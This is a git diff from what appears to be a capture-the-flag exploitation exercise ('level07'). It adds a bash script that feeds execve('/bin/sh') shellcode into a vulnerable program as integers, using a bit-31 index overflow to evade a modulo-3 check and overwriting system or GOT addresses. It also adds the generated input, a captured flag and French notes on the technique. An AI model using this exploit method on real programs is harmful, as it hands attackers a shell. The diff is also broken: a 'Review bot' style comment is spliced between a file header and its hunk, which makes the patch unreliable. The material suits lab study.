diff --git a/level07/Ressources/script.sh b/level07/Ressources/script.sh
new file mode 100755
index 0000000..603ec5e
--- /dev/null
+++ b/level07/Ressources/script.sh
@@ -0,0 +1,45 @@
+#!/bin/bash
+
+
+# shellcode is :
+# \x31\xc0\xb0\x46
+# \x31\xdb\x31\xc9
+# \xcd\x80\xeb\x16
+# \x5b\x31\xc0\x88
+# \x43\x07\x89\x5b
+# \x08\x89\x43\x0c
+# \xb0\x0b\x8d\x4b
+# \x08\x8d\x53\x0c
+# \xcd\x80\xe8\xe5
+# \xff\xff\xff\x2f
+# \x62\x69\x6e\x2f
+# \x73\x68
+
+IFS=''
+
+shellcode=(0x46b0c031 0xc931db31 0x16eb80cd 0x88c0315b 0x5b890743 0x0c438908 0x4b8d0bb0 0x0c538d08 0xe5e880cd 0x2fffffff 0x2f6e6962 0x00006873)
+
+bit_mask=2147483691
+
+init_addr=43
+
+for ((i = 0; i < ${#shellcode[@]}; i++)); do
+ echo "store"
+ echo "$(( ${shellcode[$i]} ))"
+ if (( (i + init_addr) % 3 == 0)); then
+ echo "$(( i + bit_mask ))"
+ else
+ echo "$((i + init_addr))"
+ fi
+done
+
+echo "store"
+echo "$(( 0xffffd600 ))"
+echo "$(( -1040108880 ))"
+echo "read"
+
+#for i in $(seq 0 11); do
+# echo "store"
+# echo "${shellcode[$i]}"
+# echo $(($i + $bit_mask))
+#done
diff --git a/level07/Ressources/test.txt b/level07/Ressources/test.txt
new file mode 100644
index 0000000..51fd68e
--- /dev/null
+++ b/level07/Ressources/test.txt
@@ -0,0 +1,42 @@
+store
+1185988657
+43
+store
+3375487793
+44
+store
+384532685
+2147483693
+store
+2294296923
+46
+store
+1535706947
+47
+store
+205752584
+2147483696
+store
+1267534768
+49
+store
+206802184
+50
+store
+3857219789
+2147483699
+store
+805306367
+52
+store
+795765090
+53
+store
+26739
+2147483702
+store
+4294956544 (-16 pour le vrai 28 au lieu de 44)
+-1040108880
+store
+42
+42
diff --git a/level07/flag b/level07/flag
new file mode 100644
index 0000000..73271cc
--- /dev/null
+++ b/level07/flag
@@ -0,0 +1 @@
+7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
diff --git a/level07/walkthrough b/level07/walkthrough
new file mode 100644
index 0000000..d2481d0
--- /dev/null
+++ b/level07/walkthrough
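Review bot: `bit_mask=2147483691` and `init_addr=43` in script.sh are two hard-coded constants that are really one value: the mask is exactly init_addr + 2^31 (2147483648 + 43), which is what makes `i + bit_mask` on the `% 3 == 0` branch line up with the `i + init_addr` indices of the other branch in the sequence recorded in test.txt, and editing one constant without the other silently breaks that output. Derive it and document the relation instead: `init_addr=43` followed by `bit_mask=$(( init_addr + (1 << 31) ))  # same index with bit 31 set, used for the multiple-of-3 positions (see the '(modulo 3)' remark in the walkthrough)`. `IFS=''` above the array looks like a leftover with no effect here (every expansion in the script is quoted or inside arithmetic), and the `0xffffd600` and `-1040108880` literals after the loop each deserve a one-line comment saying what they stand for. The commented-out `seq` loop at the bottom duplicates the live `for ((…))` loop and should be deleted rather than kept as dead code.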
@@ -0,0 +1,15 @@
+-1040108880On peut ecrire que 8 octets sur 12
+
+"/bin/sh" c'est 8 char avec le '\0' donc ok pour le modulo
+"/bin" => 0x2F62696E => 794978670
+"/sh\0" => 0x2F736800 => 796092416
+
+
+system on peut le call avec l'addresse, puis l'argument vers esp+quelque chose.
+
+-1040108880 Index a store avec 4159090384 (0xf7e6aed0 ou system)
+ca override le plt/got de puts
+
+
+
+override esp pour avoir le bon argument format addr de system BLANC (modulo 3) addr de /bin/sh
diff --git a/level08/Ressources/level08 b/level08/Ressources/level08
new file mode 100755
index 0000000..49adcdb
Binary files /dev/null and b/level08/Ressources/level08 differ